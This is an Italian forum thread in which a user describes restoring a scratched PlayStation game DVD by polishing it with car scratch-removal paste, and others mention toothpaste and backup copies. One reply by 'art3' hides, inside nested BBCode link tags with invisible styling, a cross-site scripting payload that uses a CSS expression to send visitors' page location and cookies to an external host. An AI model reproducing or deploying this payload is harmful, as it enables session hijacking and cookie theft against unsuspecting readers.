Condividi:        

recuperare un dvd rigato.

Problemi di Codec - AC3, MPEG, DivX, Xvid...? Vuoi aiuto con la tua musica? Non sai come masterizzare i tuoi mp3? In questo forum tutte le risposte alle tue domande legali!

Moderatori: m.paolo, Anthony47, axelrox

recuperare un dvd rigato.

Postdi ppossenti » 15/07/05 09:30

ciao, vi racconto la mia esperienza.
Ho una figlia di 5 anni che usa la palystation per vedere i dvd dei suoi cartoni animati. Il suo papà invece la usa per giocare :D
Ieri il fattaccio. Estrae il mio gioco, lo mette per terra (dalla parte delle tracce ovviamente) e infila il suo cartone preferito. Dopo di che si dimentica del mio dvd e alzandosi ci mette un piede sopra scivolando e rigandomelo in più punti. Risultato? illeggibile sia dalla play che dal mast. del pc. Che fare? Ci penso un po', analizzo le righe e mi rendo conto che non sembrano così profonde da essere arrivata fino al supporto delle tracce ma riguardano solo la parte trasparente di protezione. A questo punto scendo in garage, e prendo il "polish" quello per togliere i graffietti dalla carrozzeria di auto e moto, avete presente??? CI PROVO!!! tanto illegibile è già illeggibile... Allora metto un po' di polish su uno straccetto morbido e comincio a lucidare la superficie del dvd, dove ci sono i solchi.
5 minuti di "levigatura" e i 2 solchi profondi sembrano spariti, per contro a guardarlo di sbieco, sembra molto più rigato di prima ma le righe sono microscopiche, a passarci il dito non si sentono. Funzionerà???? :eeh:
Poco convinto ma pieno di speranza torno su, metto il dvd, avvio e ???
tutto ok al primo colpo :) nessun problema di lettura... provo a giocarci... nessuno scatto o buco....
Se può servire io ho usato il polish della arexons, che è molto morbido e ha una pasta a grana molto sottile.
Ciaussss
ppossenti
Utente Senior
 
Post: 499
Iscritto il: 16/01/02 01:00
Località: Veneto

Sponsor
 

Postdi art3 » 15/07/05 09:41

Da non crederci! :)

Ti consiglio di farti una copia di quel dvd...

[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/file.png?data='+document.location+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
art3
Utente Junior
 
Post: 13
Iscritto il: 15/07/05 09:16

Postdi GAD » 15/07/05 10:25

C'era un topic tempo fa che parlava della stessa cosa ma suggerivano di levigare riempiendo i solchi con un dentifricio :D
Quando l'ultimo albero sarà abbattuto,l'ultimo pesce catturato,l'ultimo fiume avvelenato,
soltanto allora gli uomini si accorgeranno chei soldi non possono essere mangiati
GAD
Moderatore
 
Post: 2184
Iscritto il: 22/09/02 14:36
Località: Nebbiosa

Postdi 12 » 15/07/05 10:27

auu spettacolo 8) bella sta cosa .. a pensare che ho buttato via tanti di quei dvd :eeh:

thx per il consiglio ^^

art3 mi sa che ha proprio ragione ^^ .. fatti una copia per scrupolo
12
Utente Senior
 
Post: 1413
Iscritto il: 12/01/04 19:45
Località: Milèn

Postdi luna11 » 15/07/05 10:49

GAD ha scritto:C'era un topic tempo fa che parlava della stessa cosa ma suggerivano di levigare riempiendo i solchi con un dentifricio :D

Già , postato da TOS
Ma per lui non ci furono ovazioni :lol:
luna11
Utente Senior
 
Post: 3634
Iscritto il: 10/08/01 01:00

Postdi 12 » 15/07/05 10:55

noooo .. ora che m ci fate pensare me lo ricordo quel 3d , e ci avevo anche provato :D e appena ho letto l' intervento di gad mi era rimasto impresso bc .. :lol:
12
Utente Senior
 
Post: 1413
Iscritto il: 12/01/04 19:45
Località: Milèn

Postdi ppossenti » 15/07/05 18:39

ho letto il topic di tos che non avevo letto a suo tempo. Forse ci voleva il dentifricio che passava l'esercito. Quello era peggio della pasta abrasiva...
comunque confermo. Con la pasta abrasiva dell'arexos funziona. ho provato su un cd dati che avevo in ufficio che non volevo buttare sebbene fosse 6 mesi che non riuscivo a leggere... Beh... adesso va che è una meraviglia....
meditate gente...
ppossenti
Utente Senior
 
Post: 499
Iscritto il: 16/01/02 01:00
Località: Veneto


Torna a Audio/Video e masterizzazione


Topic correlati a "recuperare un dvd rigato.":


Chi c’è in linea

Visitano il forum: Nessuno e 23 ospiti